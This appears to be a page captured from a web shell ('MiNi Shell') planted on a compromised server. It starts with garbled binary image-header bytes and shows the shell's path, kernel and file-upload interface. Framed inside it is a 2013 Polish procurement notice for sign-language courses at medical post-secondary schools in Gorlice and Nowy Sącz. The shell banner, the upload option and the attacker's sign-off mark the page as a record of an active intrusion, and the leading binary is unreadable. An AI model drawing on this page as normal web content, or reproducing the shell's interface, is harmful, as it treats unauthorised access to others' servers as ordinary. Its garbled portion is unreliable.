JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130129/38764-N-2013.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia kursów języka migowego w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 38764 - 2013; data zamieszczenia: 29.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 6442872, 501642173, faks 12 6449997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppsmis3.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia kursów języka migowego w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/. Przedmiotem niniejszego postępowania jest zorganizowanie                          i przeprowadzenie kursów języka migowego dla uczniów i uczennic Zespołu Jednostek Edukacyjnych Województwa Małopolskiego w Gorlicach - Szkoła Policealna Pracowników Służb Medycznych i Społecznych w Gorlicach oraz Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu, w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Część I zorganizowanie i przeprowadzenie kursu języka migowego w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Gorlicach - Szkoła Policealna Pracowników Służb Medycznych i Społecznych w Gorlicach
Przedmiotem zamówienia jest przeprowadzenie łącznie 60 godzin kursu języka migowego odpowiadającego kursowi I stopnia dla  7 uczniów i uczennic Zespołu Jednostek Edukacyjnych Województwa Małopolskiego 
w Gorlicach - Szkoła Policealna Pracowników Służb Medycznych 
i Społecznych w Gorlicach
Czas trwania kursu: 

60 godzin . Przez 1 godzinę trwania kursu Zamawiający rozumie 45 minut zajęć dydaktycznych. Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej.

Liczba uczestników kursu: 7 osób.
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Czas realizacji: od podpisania umowy  do 15 czerwca 2013r.
2/. Część II zorganizowanie i przeprowadzenie kursu języka migowego w Szkole Policealnej Pracowników Służb Medycznych      i Społecznych w Nowym Sączu w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce
Przedmiotem zamówienia jest realizacja łącznie 40 godzin kursu z języka migowego dla grupy 25 osób, uczniów i uczennic Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu.
Liczba uczestników: 25 osób.

Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Czas trwania kursu: 40 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę dydaktyczną 45 min. Zajęcia odbywają się w czasie wolnym od nauki w szkole, w dni powszednie.
Przewiduje się po każdej godzinie dydaktycznej 5 min. przerwy. 

Czas realizacji: do 30 kwietnia  2013 roku.
Zamawiający zaleca, aby kurs planowany był w dni powszednie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami, zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują 
dla części I - co najmniej jedną osobą posiadającą  wykształcenie wyższe z przygotowaniem pedagogicznym, która posiada minimum 2 letnie doświadczenie w nauczaniu języka migowego.
dla części II - co najmniej jedną osobą posiadającą  wykształcenie wyższe z przygotowaniem pedagogicznym, ukończony trzystopniowy kurs z języka migowego, która przeprowadziła minimum 2 kursy języka migowego dla grupy co najmniej 10 osób.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program(opis) kursu, odpowiednio dla danej części</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppsmis3.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2013 godzina 12:15, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup usług organizacji i przeprowadzenia kursu języka migowego w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Gorlicach - Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Gorlicach, ul. Jagiełły 2,38-300 Gorlice w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie łącznie 60 godzin kursu języka migowego odpowiadającego kursowi I stopnia dla  7 uczniów i uczennic Zespołu Jednostek Edukacyjnych Województwa Małopolskiego 
w Gorlicach - Szkoła Policealna Pracowników Służb Medycznych 
i Społecznych w Gorlicach
 
Wykonawca zobowiązany jest zapewnić na własny koszt wszystkie elementy związane z realizacją całości zamówienia, to jest 
w szczególności: 
a.	wykładowców zajęć teoretycznych i trenerów zajęć ćwiczeniowych dla uczestników kursu, 
b.	materiały szkoleniowe na własność dla każdego uczestnika kursu (tj. podręczniki lub skrypty zgodne z tematyką szkolenia, teczki, płyty CD z materiałami ćwiczeniowymi). 

Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji kursu (wykładowców zajęć praktycznych             i trenerów zajęć ćwiczeniowych), koszt materiałów szkoleniowych dla każdego uczestnika kursu. 
Do obowiązków Wykonawcy należy przede wszystkim: 
a.	zapewnienie dostępu do specjalistycznych materiałów dydaktycznych (szkoleniowych), 
b.	realizacja kursu przez wykwalifikowaną kadrę, posiadającą przygotowanie, kwalifikacje i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową, 
c.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy.
d.	zorganizowanie i przeprowadzenie po zakończeniu zajęć egzaminu wewnętrznego  praktycznego
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 

Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu szkolenia,
b.	program kursu oraz dziennik zajęć,
c.	protokół z egzaminu wewnętrznego praktycznego,  
d.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
e.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem. 

Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.

Ramowy program kursu: 

Program kursu musi obejmować  60 godzin zajęć języka migowego odpowiadającego I stopniowi.
Kurs musi się odbywać w oparciu o opracowany przez Wykonawcę PROGRAM kursu, załączony do oferty. 

Program ten obejmuje podstawowe treści z języka migowego, m.in.:

1.Charakterystykę niepełnosprawności. Teorię języka migowego.  System językowo-migowy.
2. Teorię daktylografii. Znaki statyczne.
3. Znaki dynamiczne. Znaki polskich liter i diagrafów. Znaki pojęć liczbowych: liczebniki główne, liczebniki porządkowe.
4. Teorię ideografii- dynamika ideografii, znaki dwuelementowe i złożone, tabele skrótów, zasada uczenia się znaków. Praktyczną naukę znaków ideograficznych opisujących pierwszy kontakt, adres, rodzinę.
5. Znaki ideograficzne związane z pobytem w szpitalu- przyjęcie, diagnoza, powiadomienie rodziny.
6. Pobyt w szpitalu- znaki związane z wywiadem osobistym rodzaje badań, operacja i leczenie.
7. Rekonwalescencję, zalecenia poszpitalne.
8. Ideogramy opisujące posiłki i zdrowe odżywianie.
9. Zdrowy wygląd, higiena. Używki- zagrożenia.
10. Ćwiczenia w nadawaniu i odbieraniu komunikatów w języku migowym, budowanie dialogów.

Czas trwania kursu: 

60 godzin . Przez 1 godzinę trwania kursu Zamawiający rozumie 45 minut zajęć dydaktycznych. Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej.

Liczba uczestników kursu: 7 osób.
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Czas realizacji: od podpisania umowy  do 15 czerwca 2013r.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego- Liderem Szkolnym po podpisaniu umowy.

Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. Umowa będzie realizowana w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Gorlicach - Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Gorlicach, ul. Jagiełły 2,38-300 Gorlice. Zamawiający udostępnia bezpłatnie sale wykładowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup usług organizacji i przeprowadzenia kursu języka migowego w Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja łącznie 40 godzin kursu z języka migowego dla grupy 25 osób, uczniów i uczennic Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu.
Wykonawca zobowiązany jest zapewnić na własny koszt wszystkie elementy związane z realizacją zamówienia, to jest w szczególności:
a.	wykładowców  posiadającą kwalifikacje i doświadczenie w prowadzeniu kursów z języka migowego, 
b.	materiały szkoleniowe dla każdego uczestnika kursu, które przechodzą na własność kursanta tj.:
aa.książka:  Szczepankowski B., Koncewicz D.:   Język migowy w terapii z płytą DVD
bb.teczka A4 skrzydłowa, długopis, kserokopie prezentacji multimedialnych. 

Ramowy program kursu:

Kurs musi się odbywać w oparciu o opracowany przez prowadzącego, według niżej wymienionych założeń PROGRAM kursu, załączony do oferty, obejmujący 40 godzin zajęć.

1.	Teoria języka migowego. Charakterystyka niepełnosprawności.  System językowo - migowy.
2.	Teoria daktylografii. Znaki alfabetu palcowego, znaki pojęć liczbowych.
3.	Teoria ideografii.
4.	Praktyczna nauka znaków ideograficznych opisujących rodzinę.
5.	Ideogramy związane z pobytem w szpitalu, opisujące badania lekarskie, operacje i leczenie.
6.	Ideogramy opisujące posiłki i zdrowe odżywianie.
7.	Praktyczna nauka znaków migowych opisujących wygląd zewnętrzny i higienę.
8.	Ideogramy opisujące rekonwalescencję, powrót do zdrowia, zalecenia poszpitalne.
9.	Ideogramy dotyczące używek, zagrożeń oraz zdrowego wyglądu.

Liczba uczestników: 25 osób.

Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Czas trwania kursu: 40 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę dydaktyczną 45 min. Zajęcia odbywają się w czasie wolnym od nauki w szkole, w dni powszednie.
Przewiduje się po każdej godzinie dydaktycznej 5 min. przerwy. 

Czas realizacji: do 30 kwietnia  2013 roku.
Zamawiający zaleca, aby kurs planowany był w dni powszednie.

Szczegółowy harmonogram realizacji przedmiotu zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, w dni powszednie. 
Umowa będzie realizowana w Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu.
Zamawiający udostępnia bezpłatnie sale wykładowe. 

Obowiązki wykonawcy:
Do obowiązków Wykonawcy należy przede wszystkim:
e.	zapewnienie dostępu do materiałów dydaktycznych które przechodzą na własność kursanta:
aa.25 szt. książek:  Szczepankowski B., Koncewicz D.: Język migowy w terapii z płytą DVD
bb.25 szt. teczek A4 skrzydłowych z rzepem, 
cc.25 szt. długopisów, 
dd.25 szt. kserokopii prezentacji multimedialnych. 
f.	realizacja kursu przez wykwalifikowanych trenerów/kadrę, posiadającą kwalifikacje i doświadczenie w prowadzeniu kursów           z tematu objętego przedmiotową umową, 
g.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy,
h.	zorganizowanie i przeprowadzenie po zakończeniu zajęć egzaminu wewnętrznego  praktycznego,
i.	opracowanie i wręczenie kursantom zaświadczeń o ukończeniu kursu, według wzorów przekazanych przez przedstawiciela Zamawiającego.
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.stosowania na wszystkich dokumentach  znaków zgodnie z wytycznymi POKL.
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych.
Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu szkolenia,
b.program kursu oraz dziennik zajęć,
c.	protokół z egzaminu wewnętrznego praktycznego,  
d.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem kserokopii prezentacji multimedialnych ,
e.	kopie zaświadczeń o ukończeniu kursu wraz z potwierdzeniem ich odbioru przez uczestników kursu,
f.	informację o zrealizowaniu usługi wraz z rachunkiem/Fakturą Va.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com